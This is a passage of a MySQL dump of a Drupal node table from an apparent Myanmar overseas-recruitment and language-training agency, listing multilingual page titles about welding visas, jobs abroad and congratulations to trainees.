  `type` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `status` tinyint NOT NULL,
  `uid` int UNSIGNED NOT NULL COMMENT 'The ID of the target entity.',
  `title` varchar(255) NOT NULL,
  `created` int NOT NULL,
  `changed` int NOT NULL,
  `promote` tinyint NOT NULL,
  `sticky` tinyint NOT NULL,
  `default_langcode` tinyint NOT NULL,
  `revision_translation_affected` tinyint DEFAULT NULL,
  `content_translation_source` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `content_translation_outdated` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The data table for node entities.';

--
-- Dumping data for table `node_field_data`
--

INSERT INTO `node_field_data` (`nid`, `vid`, `type`, `langcode`, `status`, `uid`, `title`, `created`, `changed`, `promote`, `sticky`, `default_langcode`, `revision_translation_affected`, `content_translation_source`, `content_translation_outdated`) VALUES
(1, 206, 'page', 'en', 1, 1, 'About Us', 1687235565, 1689413814, 0, 0, 1, NULL, 'und', 0),
(1, 206, 'page', 'ja', 1, 2, '弊社ウェブサイト', 1688382532, 1689915940, 0, 0, 0, NULL, 'en', 0),
(1, 206, 'page', 'ko', 1, 2, 'About Us', 1688382695, 1689652632, 0, 0, 0, NULL, 'en', 0),
(3, 213, 'announcement', 'en', 1, 1, 'Who should attend E 7-3 Welding Class?', 1687238109, 1688376827, 0, 0, 1, NULL, 'und', 0),
(3, 213, 'announcement', 'ja', 1, 2, 'E 7-3 溶接クラスには誰が参加すべきですか?', 1688388943, 1689929077, 0, 0, 0, 1, 'en', 0),
(3, 213, 'announcement', 'ko', 1, 2, 'Who should attend E 7-3 Welding Class?', 1688388959, 1688388967, 0, 0, 0, NULL, 'en', 0),
(4, 210, 'announcement', 'en', 0, 1, 'Wanted Desperately', 1687238298, 1689927311, 0, 0, 1, 1, 'und', 0),
(4, 210, 'announcement', 'ja', 0, 2, 'Wanted Desperately', 1688388939, 1689927237, 0, 0, 0, NULL, 'en', 0),
(4, 210, 'announcement', 'ko', 0, 2, 'Contact us for more information.', 1688388956, 1689927282, 0, 0, 0, NULL, 'en', 0),
(5, 359, 'announcement', 'en', 1, 1, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1687238451, 1688365096, 0, 0, 1, NULL, 'und', 0),
(5, 359, 'announcement', 'ja', 1, 1, 'パスポートを持っていてシンガポールの建設現場で一般労働者として働きたい人のための5つのポジションが切実に必要とされています', 1692250348, 1692280669, 0, 0, 0, NULL, 'en', 0),
(5, 359, 'announcement', 'ko', 1, 2, '5 positions for those who have passports and want to work as General Workers at Construction sites in Singapore are needed desperately.', 1688388958, 1688388965, 0, 0, 0, NULL, 'en', 0),
(6, 214, 'activities', 'en', 1, 1, 'In order to get employed to the shipyard in Korea with an E7-3 Visa, the trainees are explained what is needed to quickly come and check the welding exam.', 1687240083, 1688546491, 0, 0, 1, NULL, 'und', 0),
(6, 214, 'activities', 'ja', 1, 2, 'E7-3ビザを持って韓国の造船所で雇用されるためには、研修生に対して迅速に来て溶接試験を受けるために必要な内容が説明されます。', 1688388644, 1689929221, 0, 0, 0, 1, 'en', 0),
(6, 214, 'activities', 'ko', 1, 2, 'ကိုရီးယားနိုင်ငံရှိ သင်္ဘောကျင်းကို E7-3 Viza နဲ့ သွားရောက်နိုင်ဖို့ သင်တန်းသားများကို ကိုရီးယားမှ လာရောက်၍ ဂဟေဆော် စာမေးပွဲ အမြန်လာရောက် စစ်ဆေးနိုင်ဖို့ လိုအပ်သည်များကို ရှင်းလင်း ပြောကြား', 1688388653, 1688388655, 0, 0, 0, NULL, 'en', 0),
(7, 288, 'activities', 'en', 1, 1, 'E-7 visa - A special Ability visa for Foreign Nationals.', 1687240759, 1688547023, 0, 0, 1, NULL, 'und', 0),
(7, 288, 'activities', 'ja', 1, 2, 'E-7ビザは外国人に対する特定能力を持つ方のための特別なビザです。', 1688388674, 1689929528, 0, 0, 0, NULL, 'en', 0),
(7, 288, 'activities', 'ko', 1, 2, 'E-7 visa - A special Ability visa for Foreign Nationals.', 1688388683, 1690783384, 0, 0, 0, 1, 'en', 0),
(8, 215, 'activities', 'en', 1, 1, 'Wanted people who want to work as a Welder (expert welding technician) in Korea Shipyard.', 1687240986, 1688546702, 0, 0, 1, NULL, 'und', 0),
(8, 215, 'activities', 'ja', 1, 2, '韓国の造船所で溶接技術者として働きたい人を募集しています。（経験豊富な溶接技術者）', 1688388288, 1689929372, 0, 0, 0, 1, 'en', 0),
(8, 215, 'activities', 'ko', 1, 2, 'Korea သင်္ဘောကျင်းတွင် Welder (ကျွမ်းကျင် ဂဟေဆော်ပညာရှင်) အဖြစ် သွားရောက် လုပ်ကိုင်လိုသူများ အလိုရှိသည်။', 1688388296, 1688388422, 0, 0, 0, NULL, 'en', 0),
(9, 187, 'activities', 'en', 1, 1, 'The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalike Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.', 1687241497, 1688546162, 0, 0, 1, NULL, 'und', 0),
(9, 187, 'activities', 'ja', 1, 2, 'ニューコメット商社株式会社のシンマライク造船所からの初めての溶接研修生たちが、運輸通信省の副大臣によって出迎えられ、スピーチを行い、訓練校を視察しました。', 1688388729, 1689841547, 0, 0, 0, 1, 'en', 0),
(9, 187, 'activities', 'ko', 1, 2, 'ဆင်မလိုက် သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ် ဂဟေဆော် သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့် ဆက်သွယ်ရေးဝန်ကြီးဌာနမှ ဒုဝန်ကြီးမှ လာရောက်တွေ့ဆုံ၍  အမှာစကားများ ပြောကြားပေးပြီး သင်တန်းကျောင်းအား လာရောက်စစ်ဆေးစဉ်', 1688388738, 1688388741, 0, 0, 0, NULL, 'en', 0),
(10, 358, 'announcement', 'en', 1, 1, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1687265813, 1688361721, 0, 0, 1, NULL, 'und', 0),
(10, 358, 'announcement', 'ja', 1, 2, '韓国の造船所で電気エンジニアのポジションで働きたい経験豊富なエンジニアを緊急で募集しています。', 1688388899, 1692280580, 0, 0, 0, NULL, 'en', 0),
(10, 358, 'announcement', 'ko', 1, 2, 'Expert Engineers who want to work at South Korea Shipyards as Electrical Engineer position are wanted desperately.', 1688388912, 1688388916, 0, 0, 0, NULL, 'en', 0),
(11, 314, 'page', 'en', 1, 1, 'Contact Us', 1687305757, 1690956144, 0, 0, 1, NULL, 'und', 0),
(11, 314, 'page', 'ja', 1, 2, 'お問い合わせ', 1688383131, 1692240899, 0, 0, 0, 1, 'en', 0),
(11, 314, 'page', 'ko', 1, 2, '연락처', 1688383142, 1690956203, 0, 0, 0, NULL, 'en', 0),
(17, 188, 'activities', 'en', 1, 1, 'The first batch of welding trainees from NEW COMET TRADING AGENCY CO.,LTD from Sinmalai Shipyard was met by the Deputy Minister of the Ministry of Transport and Communications and gave speeches and inspected the training school.', 1688194656, 1688546090, 0, 0, 1, NULL, 'und', 0),
(17, 188, 'activities', 'ja', 1, 2, 'ニューコメット商社株式会社のシンマライク造船所からの初めての溶接研修生たちが、運輸通信省の副大臣によって出迎えられ、スピーチを行い、訓練校を視察しました。', 1688388699, 1689841671, 0, 0, 0, 1, 'en', 0),
(17, 188, 'activities', 'ko', 1, 2, 'ဆင်မလိုက်သင်္ဘောကျင်းမှ NEW COMET TRADING AGENCY CO.,LTD မှ ပထမအသုတ်ဂဟေဆော်သင်တန်းသားများအား ပို့ဆောင်ရေးနှင့်ဆက်သွယ်ရေးဝန်ကြီး ဌာနမှ ဒုဝန်ကြီးမှလာရောက်တွေ့ဆုံ၍  အမှာစကားများပြောကြားပေးပြီး သင်တန်းကျောင်းအားလာရောက်စစ်ဆေးစဉ်', 1688388710, 1688388714, 0, 0, 0, NULL, 'en', 0),
(18, 357, 'announcement', 'en', 1, 1, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688195851, 1688362772, 0, 0, 1, NULL, 'und', 0),
(18, 357, 'announcement', 'ja', 1, 2, 'ドバイまたはアブダビの5つ星ホテルで働くフード＆ビバレッジホステスを緊急で求めています。', 1688388901, 1692280481, 0, 0, 0, NULL, 'en', 0),
(18, 357, 'announcement', 'ko', 1, 2, 'Food & Beverage Hostess to work at 5 stars hotels in Dubai or Abu dhabi are wanted desperately.', 1688388914, 1688388919, 0, 0, 0, NULL, 'en', 0),
(19, 186, 'activities', 'en', 1, 1, 'Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa', 1688200678, 1688377651, 0, 0, 1, NULL, 'und', 0),
(19, 186, 'activities', 'ja', 1, 2, '第1バッチから60人以上の方が、溶接技術者のE 7-3ビザポジションで韓国に行くためのKOSHIPAスキルテストの受験登録に来られました。', 1688388770, 1689841260, 0, 0, 0, 1, 'en', 0),
(19, 186, 'activities', 'ko', 1, 2, 'Over 60 people from 1st Batch came to register for KOSHIPA Skill Test to go to Korea with welding technician position E 7-3 Visa', 1688388781, 1688388791, 0, 0, 0, NULL, 'en', 0),
(20, 185, 'activities', 'en', 1, 1, 'Memorial Photo of 2nd Batch Welding Students', 1688204366, 1688377233, 0, 0, 1, NULL, 'und', 0),
(20, 185, 'activities', 'ja', 1, 2, '第2回生　研修生達と記念 ', 1688388745, 1689840443, 0, 0, 0, 1, 'en', 0),
(20, 185, 'activities', 'ko', 1, 2, 'Memorial Photo of 2nd Batch Welding Students', 1688388761, 1688388764, 0, 0, 0, NULL, 'en', 0),
(21, 91, 'slider', 'en', 1, 2, 'slider1', 1688383642, 1688383668, 0, 0, 1, 1, 'und', 0),
(22, 92, 'slider', 'en', 1, 2, 'slider2', 1688383679, 1688383690, 0, 0, 1, 1, 'und', 0),
(23, 306, 'page', 'en', 1, 2, 'Company Profile', 1688384143, 1692068546, 0, 0, 1, NULL, 'und', 0),
(23, 306, 'page', 'ja', 1, 2, '会社情報', 1688384224, 1692068740, 0, 0, 0, NULL, 'en', 0),
(23, 306, 'page', 'ko', 1, 2, '회사 설립', 1688384243, 1692068891, 0, 0, 0, 1, 'en', 0),
(24, 413, 'page', 'en', 1, 2, 'Our Services', 1688384288, 1693623453, 0, 0, 1, NULL, 'und', 0),
(24, 413, 'page', 'ja', 1, 2, '事業内容', 1688384311, 1693623429, 0, 0, 0, NULL, 'en', 0),
(24, 413, 'page', 'ko', 1, 2, '회사 서비스', 1688432702, 1693623472, 0, 0, 0, 1, 'en', 0),
(25, 287, 'page', 'en', 1, 2, 'Vision & Mission ', 1688384376, 1690782799, 0, 0, 1, NULL, 'und', 0),
(25, 287, 'page', 'ja', 1, 2, '目標 & ミッション', 1688384401, 1690782722, 0, 0, 0, NULL, 'en', 0),
(25, 287, 'page', 'ko', 1, 2, '우리의 비젼 & 우리의 미션', 1688384459, 1690782855, 0, 0, 0, 1, 'en', 0),
(26, 309, 'page', 'en', 1, 2, 'Future Goal', 1688384477, 1692069077, 0, 0, 1, NULL, 'und', 0),
(26, 309, 'page', 'ja', 1, 2, '会社の目標', 1688384504, 1692069113, 0, 0, 0, NULL, 'en', 0),
(26, 309, 'page', 'ko', 1, 2, '회사의 미래 비전', 1688384529, 1692069142, 0, 0, 0, 1, 'en', 0),
(27, 273, 'page', 'en', 1, 2, 'Company History', 1688384566, 1690604922, 0, 0, 1, NULL, 'und', 0),
(27, 273, 'page', 'ja', 1, 2, '会社沿革', 1688384583, 1690605069, 0, 0, 0, 1, 'en', 0),
(27, 273, 'page', 'ko', 1, 2, 'Company History', 1688384601, 1690282650, 0, 0, 0, NULL, 'en', 0),
(28, 220, 'activities', 'en', 1, 1, 'HIT LANGUAGE CENTER has started teaching Korean language courses and Japanese language courses in cooperation with NEW COMET TRADING AGENCY. Those who want to learn can register quickly.', 1689933496, 1689933768, 0, 0, 1, NULL, 'und', 0),
(28, 220, 'activities', 'ja', 1, 1, 'HIT LANGUAGE CENTER」は、NEW COMET TRADING AGENCYとの協力のもと、韓国語コースと日本語コースの教室を開始しました。学びたい方は、早めに登録してください。', 1689933782, 1689933982, 0, 0, 0, NULL, 'en', 0),
(28, 220, 'activities', 'ko', 1, 1, 'HIT LANGUAGE CENTER」는 NEW COMET TRADING AGENCY와의 협력으로 한국어 코스와 일본어 코스를 개설했습니다. 관심있는 분들은 빠르게 등록해주세요.', 1689933989, 1689934025, 0, 0, 0, 1, 'en', 0),
(29, 223, 'activities', 'en', 1, 1, 'The person in charge of the Korean side of NEW COMET TRADING AGENCY, Mr.Hong explained the question of when you can answer the KOSHIPA TEST estimate at HIT LANGUAGE CENTER.', 1689934044, 1689934449, 0, 0, 1, NULL, 'und', 0),
(29, 223, 'activities', 'ja', 1, 1, 'NEW COMET TRADING AGENCYの韓国側担当者、Mr.HongがHIT LANGUAGE CENTERでKOSHIPA TESTの評価結果が得られる見込みの日について説明しました。', 1689934455, 1689934512, 0, 0, 0, NULL, 'en', 0),
(29, 223, 'activities', 'ko', 1, 1, 'NEW COMET TRADING AGENCY의 한국 측 담당자인 홍씨가 HIT LANGUAGE CENTER에서 KOSHIPA TEST 평가 결과를 받을 수 있는 시기에 대해 설명했습니다.', 1689934518, 1689934558, 0, 0, 0, 1, 'en', 0),
(30, 226, 'announcement', 'en', 1, 1, 'We urgently need the following skilled workers to work in Singapore', 1689935306, 1689935390, 0, 0, 1, NULL, 'und', 0),
(30, 226, 'announcement', 'ja', 1, 1, '以下の熟練労働者をシンガポールで緊急に求めています。', 1689935395, 1689935437, 0, 0, 0, NULL, 'en', 0),
(30, 226, 'announcement', 'ko', 1, 1, '긴급하게 다음과 같은 숙련 노동자들이 싱가포르에서 일할 필요가 있습니다.', 1689935482, 1689935517, 0, 0, 0, 1, 'en', 0),
(31, 259, 'announcement', 'en', 1, 1, 'We are looking for professional Welders who wants to work at Korean Shipyards', 1690352681, 1690357358, 0, 0, 1, 1, 'und', 0),
(62, 409, 'announcement', 'en', 1, 1, 'Starting from September 18th, 2023, seize the opportunity to enroll in our exclusive JLPT N4 and N3 classes', 1692941437, 1693194347, 0, 0, 0, NULL, 'ja', 0),
(62, 409, 'announcement', 'ja', 1, 1, '2023年1月18日から、独占的なJLPT N4およびN3クラスの受講のチャンスを掴んでください。初心者でも、語学の磨きをかけたい方でも、私たちのカスタマイズされたコースがお手伝いします。', 1692940360, 1693194768, 0, 0, 1, 1, 'und', 0),
(66, 420, 'announcement', 'en', 1, 1, ' Exciting News for Japanese Language Enthusiasts! ', 1707206497, 1713156227, 0, 0, 1, 1, 'und', 0),
(67, 421, 'activities', 'ja', 1, 1, 'Wishing Everyone a Happy New Day! ', 1707209784, 1713156247, 0, 0, 1, 1, 'und', 0),
(68, 424, 'activities', 'en', 1, 1, 'Congratulations (22-4-2024)', 1719289801, 1719291332, 0, 0, 1, 1, 'und', 0),
(68, 424, 'activities', 'ja', 1, 1, 'Congratulations (22-4-2024)', 1719290898, 1719291143, 0, 0, 0, 1, 'en', 0),
(69, 426, 'activities', 'en', 1, 1, 'Congratulations (9-4-2024)', 1719292222, 1719292567, 0, 0, 0, 1, 'ja', 0),
(69, 426, 'activities', 'ja', 1, 1, 'Congratulations (9-4-2024)', 1719291375, 1719292191, 0, 0, 1, NULL, 'und', 0),
(70, 430, 'activities', 'en', 1, 1, 'Congrats ', 1719295125, 1719296098, 0, 0, 1, NULL, 'und', 0),
(70, 430, 'activities', 'ja', 1, 1, 'Congrats ', 1719296133, 1719296559, 0, 0, 0, 1, 'en', 0),
(71, 431, 'activities', 'en', 1, 1, 'Congratulations!!', 1719295190, 1719296385, 0, 0, 1, NULL, 'und', 0),
(71, 431, 'activities', 'ja', 1, 1, 'Congratulations!!', 1719296400, 1719296751, 0, 0, 0, 1, 'en', 0),
(72, 435, 'activities', 'en', 1, 1, 'Congratulations!!', 1719296820, 1719297635, 0, 0, 1, NULL, 'und', 0),
(72, 435, 'activities', 'ja', 1, 1, 'Congratulations!!', 1719297648, 1719297741, 0, 0, 0, 1, 'en', 0),
(73, 439, 'activities', 'en', 1, 1, 'Congratulations (19-5-2024)', 1719296913, 1719297947, 0, 0, 1, NULL, 'und', 0),
(73, 439, 'activities', 'ja', 1, 1, 'Congratulations (19-5-2024)', 1719297960, 1719298494, 0, 0, 0, 1, 'en', 0),
(74, 440, 'activities', 'en', 1, 1, 'Congratulations!!', 1719297778, 1719298533, 0, 0, 1, 1, 'und', 0),
(74, 440, 'activities', 'ja', 1, 1, 'Congratulations!!', 1719298217, 1719298434, 0, 0, 0, NULL, 'en', 0),
(75, 448, 'activities', 'en', 1, 1, 'Congratulations to CHIT SAYAH OO!!', 1719300877, 1719301974, 0, 0, 1, 1, 'und', 0),
(75, 448, 'activities', 'ja', 1, 1, 'CHIT SAYAH OOさん、おめでとうございます！!!', 1719301498, 1719301861, 0, 0, 0, NULL, 'en', 0),
(76, 447, 'activities', 'en', 1, 1, 'Congratulations (19-5-2024)', 1719301438, 1719301871, 0, 0, 1, NULL, 'und', 0),
(76, 447, 'activities', 'ja', 1, 1, 'Congratulations (19-5-2024)', 1719301884, 1719301957, 0, 0, 0, 1, 'en', 0),
(77, 450, 'activities', 'en', 1, 1, 'Congratulations (25-6-2024)', 1719302198, 1719305316, 0, 0, 1, NULL, 'und', 0),
(77, 450, 'activities', 'ja', 1, 1, 'Congratulations (25-6-2024)', 1719305363, 1719305714, 0, 0, 0, 1, 'en', 0),
(78, 452, 'activities', 'en', 1, 1, 'Congratulations ( 13-6-2024)', 1719306396, 1719306699, 0, 0, 1, NULL, 'und', 0),
(78, 452, 'activities', 'ja', 1, 1, 'Congratulations ( 13-6-2024)', 1719306717, 1719306801, 0, 0, 0, 1, 'en', 0),
(79, 453, 'activities', 'en', 1, 1, 'Congratulations (2-6-2024)', 1719307033, 1719308229, 0, 0, 1, 1, 'und', 0),
(80, 455, 'activities', 'en', 1, 1, 'Congratulations (2-6-2024)', 1719308348, 1719309084, 0, 0, 1, NULL, 'und', 0),
(80, 455, 'activities', 'ja', 1, 1, 'Congratulations (2-6-2024)', 1719309096, 1719309239, 0, 0, 0, 1, 'en', 0),
(81, 457, 'activities', 'en', 1, 1, 'CONGRATULATIONS FOR PASSING INTERVIEW! KAUNG MYAT SOE! ', 1719309278, 1719309533, 0, 0, 1, NULL, 'und', 0),
(81, 457, 'activities', 'ja', 1, 1, 'CONGRATULATIONS FOR PASSING INTERVIEW! KAUNG MYAT SOE! ', 1719309544, 1719309613, 0, 0, 0, 1, 'en', 0),
(82, 459, 'activities', 'en', 1, 1, 'Congratulations to MYO KHANT!!', 1719301992, 1719311486, 0, 0, 1, NULL, 'und', 0),
(82, 459, 'activities', 'ja', 1, 1, ' MYO KHANT、おめでとうございます！', 1719311528, 1719311707, 0, 0, 0, 1, 'en', 0),
(83, 464, 'activities', 'en', 1, 1, 'Congratulation For Getting COE  ', 1719311392, 1719311899, 0, 0, 1, NULL, 'und', 0),
(83, 464, 'activities', 'ja', 1, 1, 'Congratulation For Getting COE  ', 1719311918, 1719312245, 0, 0, 0, 1, 'en', 0),
(84, 465, 'activities', 'en', 1, 1, 'Congratulations to YE MONG AUNG!!', 1719311720, 1719312126, 0, 0, 1, NULL, 'und', 0),
(84, 465, 'activities', 'ja', 1, 1, 'YE MONG AUNG、おめでとうございます！', 1719312195, 1719312476, 0, 0, 0, 1, 'en', 0),
(85, 463, 'activities', 'en', 1, 1, 'CONGRATULATIONS TO PAING MYO ZAW ', 1719309679, 1719312138, 0, 0, 1, NULL, 'und', 0),
(85, 463, 'activities', 'ja', 1, 1, 'CONGRATULATIONS TO PAING MYO ZAW ', 1719312166, 1719312207, 0, 0, 0, 1, 'en', 0),
(86, 467, 'activities', 'en', 1, 1, 'Congratulations For Getting COE ', 1719312257, 1719312687, 0, 0, 1, NULL, 'und', 0),
(86, 467, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE ', 1719312697, 1719312873, 0, 0, 0, 1, 'en', 0),
(87, 476, 'activities', 'en', 1, 1, 'Things to Beware while working in Japan', 1719313142, 1719313146, 0, 0, 0, NULL, 'ja', 0),
(87, 476, 'activities', 'ja', 1, 1, 'Things to Beware while working in Japan', 1719312490, 1719313680, 0, 0, 1, 1, 'und', 0),
(88, 471, 'activities', 'en', 1, 1, 'Congratulation For Getting COE  ', 1719312967, 1719313150, 0, 0, 1, NULL, 'und', 0),
(88, 471, 'activities', 'ja', 1, 1, 'Congratulation For Getting COE  ', 1719313161, 1719313203, 0, 0, 0, 1, 'en', 0),
(89, 473, 'activities', 'en', 1, 1, 'Congratulations For Getting COE  ', 1719313210, 1719313467, 0, 0, 1, NULL, 'und', 0),
(89, 473, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE  ', 1719313471, 1719313506, 0, 0, 0, 1, 'en', 0),
(90, 478, 'activities', 'en', 1, 1, 'Congratulations to CHAW CHIT KYAW!!', 1719312499, 1719313640, 0, 0, 1, NULL, 'und', 0),
(90, 478, 'activities', 'ja', 1, 1, 'CHAW CHIT KYAW、おめでとうございます！！', 1719313660, 1719313797, 0, 0, 0, 1, 'en', 0),
(91, 480, 'activities', 'en', 1, 1, 'Congratulations For Getting COE ', 1719313625, 1719313857, 0, 0, 1, NULL, 'und', 0),
(91, 480, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE ', 1719313861, 1719313914, 0, 0, 0, 1, 'en', 0),
(92, 482, 'activities', 'en', 1, 1, 'Congratulations For Getting COE ', 1719314017, 1719314184, 0, 0, 1, NULL, 'und', 0),
(92, 482, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE ', 1719314189, 1719314223, 0, 0, 0, 1, 'en', 0),
(93, 484, 'activities', 'en', 1, 1, 'Congratulations For Getting COE おめでとう！  YA MIN THET さんと SHIN THANT PHYU さん、COE 取得おめでとうございます', 1719314427, 1719314643, 0, 0, 1, NULL, 'und', 0),
(93, 484, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE ', 1719314648, 1719314714, 0, 0, 0, 1, 'en', 0),
(94, 485, 'activities', 'en', 1, 1, 'Congratulations For Getting COE ', 1719314848, 1719315003, 0, 0, 1, 1, 'und', 0),
(95, 524, 'activities', 'en', 1, 1, 'ACTIVITIES FOR 3TH BATCH OF ON-JOB TRAINING(RESTAURANT) ', 1719313690, 1719398112, 0, 0, 1, 1, 'und', 0),
(95, 524, 'activities', 'ja', 1, 1, 'ACTIVITIES FOR 2ND BATCH OF ON-JOB TRAINING(RESTAURANT) ', 1719315595, 1719315692, 0, 0, 0, NULL, 'en', 0),
(96, 489, 'activities', 'en', 1, 1, 'Congralutations For Getting COE', 1719315520, 1719315929, 0, 0, 1, NULL, 'und', 0),
(96, 489, 'activities', 'ja', 1, 1, 'Congralutations For Getting COE', 1719315935, 1719316010, 0, 0, 0, 1, 'en', 0),
(97, 491, 'activities', 'en', 1, 1, 'Congralutations For Getting COE', 1719316075, 1719316438, 0, 0, 1, NULL, 'und', 0),
(97, 491, 'activities', 'ja', 1, 1, 'Congralutations For Getting COE', 1719316506, 1719316533, 0, 0, 0, 1, 'en', 0),
(98, 493, 'activities', 'en', 1, 1, '2nd batch Pratical Class for Restaurant', 1719316079, 1719316566, 0, 0, 1, NULL, 'und', 0),
(98, 493, 'activities', 'ja', 1, 1, '2nd batch Pratical Class for Restaurant', 1719316573, 1719316648, 0, 0, 0, 1, 'en', 0),
(99, 495, 'activities', 'en', 1, 1, 'Congralutations For Getting COE', 1719316638, 1719316788, 0, 0, 1, NULL, 'und', 0),
(99, 495, 'activities', 'ja', 1, 1, 'Congralutations For Getting COE', 1719316800, 1719316846, 0, 0, 0, 1, 'en', 0),
(100, 497, 'activities', 'en', 1, 1, 'Congratulations to BO BO ZAW!', 1719383205, 1719383465, 0, 0, 1, NULL, 'und', 0),
(100, 497, 'activities', 'ja', 1, 1, 'Congratulations to BO BO ZAW!', 1719383481, 1719386107, 0, 0, 0, 1, 'en', 0),
(101, 499, 'activities', 'en', 1, 1, 'Congratulations for YAMIN PHYO!', 1719392698, 1719393267, 0, 0, 1, NULL, 'und', 0),
(101, 499, 'activities', 'ja', 1, 1, 'Congratulations for YAMIN PHYO!', 1719393285, 1719393363, 0, 0, 0, 1, 'en', 0),
(102, 501, 'activities', 'en', 1, 1, 'Congrats THAE SU YATI SOE!', 1719393421, 1719393839, 0, 0, 1, NULL, 'und', 0),
(102, 501, 'activities', 'ja', 1, 1, 'Congrats THAE SU YATI SOE!', 1719393864, 1719394008, 0, 0, 0, 1, 'en', 0),
(103, 505, 'activities', 'en', 1, 1, 'Congratulations For Getting COE ', 1719392034, 1719394260, 0, 0, 1, NULL, 'und', 0),
(103, 505, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE ', 1719394270, 1719394403, 0, 0, 0, 1, 'en', 0),
(104, 504, 'activities', 'en', 1, 1, 'Congratulations KHAING SAPAL OO!', 1719394044, 1719394273, 0, 0, 1, NULL, 'und', 0),
(104, 504, 'activities', 'ja', 1, 1, 'Congratulations KHAING SAPAL OO!', 1719394283, 1719394347, 0, 0, 0, 1, 'en', 0),
(105, 507, 'activities', 'en', 1, 1, 'Congratulations For Getting COE ', 1719394561, 1719394775, 0, 0, 1, NULL, 'und', 0),
(105, 507, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE ', 1719394779, 1719394942, 0, 0, 0, 1, 'en', 0),
(106, 509, 'activities', 'en', 1, 1, 'Congrats KHAING THAW THAW KHANT!', 1719394537, 1719395347, 0, 0, 1, NULL, 'und', 0),
(106, 509, 'activities', 'ja', 1, 1, 'Congrats KHAING THAW THAW KHANT!', 1719395358, 1719395406, 0, 0, 0, 1, 'en', 0),
(107, 511, 'activities', 'en', 1, 1, 'Congratulations PYAE SONE THU!', 1719395641, 1719395840, 0, 0, 1, NULL, 'und', 0),
(107, 511, 'activities', 'ja', 1, 1, 'Congratulations PYAE SONE THU!', 1719395851, 1719395931, 0, 0, 0, 1, 'en', 0),
(108, 513, 'activities', 'en', 1, 1, 'Congratulations For Getting COE ', 1719395828, 1719396059, 0, 0, 1, NULL, 'und', 0),
(108, 513, 'activities', 'ja', 1, 1, 'Congratulations For Getting COE ', 1719396064, 1719396095, 0, 0, 0, 1, 'en', 0),
(109, 515, 'activities', 'en', 1, 1, 'Congrats CHAN MYAE THU!', 1719396063, 1719396241, 0, 0, 1, NULL, 'und', 0),
(109, 515, 'activities', 'ja', 1, 1, 'Congrats CHAN MYAE THU!', 1719396247, 1719396373, 0, 0, 0, 1, 'en', 0),
(110, 517, 'activities', 'en', 1, 1, 'Congratulations YAW CHANG!', 1719396466, 1719396713, 0, 0, 1, NULL, 'und', 0),
(110, 517, 'activities', 'ja', 1, 1, 'Congratulations YAW CHANG!', 1719396725, 1719396790, 0, 0, 0, 1, 'en', 0),
(111, 519, 'activities', 'en', 1, 1, 'Congratulations(19-5-2024)', 1719396487, 1719397202, 0, 0, 1, NULL, 'und', 0),
(111, 519, 'activities', 'ja', 1, 1, 'Congratulations(19-5-2024)', 1719397209, 1719397256, 0, 0, 0, 1, 'en', 0),
(112, 521, 'activities', 'en', 1, 1, 'Congrats ADIN MIN MAW & MIN KHANT KYAW', 1719397443, 1719397446, 0, 0, 1, 1, 'und', 0),
(112, 521, 'activities', 'ja', 1, 1, 'Congrats ADIN MIN MAW & MIN KHANT KYAW', 1719397455, 1719397518, 0, 0, 0, 1, 'en', 0),
(113, 523, 'activities', 'en', 1, 1, 'Congratulations(29-5-2024)', 1719397375, 1719397758, 0, 0, 1, NULL, 'und', 0),
(113, 523, 'activities', 'ja', 1, 1, 'Congratulations(29-5-2024)', 1719397763, 1719397829, 0, 0, 0, 1, 'en', 0),
(114, 526, 'activities', 'en', 1, 1, 'Congrats YU MON AUNG & MAY MYO KHAING', 1719397588, 1719398127, 0, 0, 1, NULL, 'und', 0),
(114, 526, 'activities', 'ja', 1, 1, 'Congrats YU MON AUNG & MAY MYO KHAING', 1719398132, 1719398189, 0, 0, 0, 1, 'en', 0),
(115, 528, 'activities', 'en', 1, 1, 'Congrats LI SOUNG OO, THANDAR MOE, KHU RICHARD, PYAE SONE AUNG', 1719398517, 1719398759, 0, 0, 1, NULL, 'und', 0),
(115, 528, 'activities', 'ja', 1, 1, 'Congrats LI SOUNG OO, THANDAR MOE, KHU RICHARD, PYAE SONE AUNG', 1719398770, 1719398849, 0, 0, 0, 1, 'en', 0),
(116, 531, 'activities', 'en', 1, 1, 'Images of 2th batch Resturtant Internship ', 1719398601, 1719399020, 0, 0, 1, NULL, 'und', 0),
(116, 531, 'activities', 'ja', 1, 1, 'Images of 2th batch Resturtant Internship ', 1719399024, 1719399098, 0, 0, 0, 1, 'en', 0),
(117, 532, 'activities', 'en', 1, 1, 'Congrats EI EAINDRA AUNG !', 1719398961, 1719399089, 0, 0, 1, NULL, 'und', 0),
(117, 532, 'activities', 'ja', 1, 1, 'Congrats EI EAINDRA AUNG !', 1719399098, 1719399137, 0, 0, 0, 1, 'en', 0),
(118, 534, 'activities', 'en', 1, 1, 'Congrats AUNG THURA', 1719399178, 1719399288, 0, 0, 1, NULL, 'und', 0),
(118, 534, 'activities', 'ja', 1, 1, 'Congrats AUNG THURA', 1719399295, 1719399332, 0, 0, 0, 1, 'en', 0),
(119, 537, 'activities', 'en', 1, 1, 'Congrats THATOE AUNG', 1719399386, 1719399541, 0, 0, 1, NULL, 'und', 0),
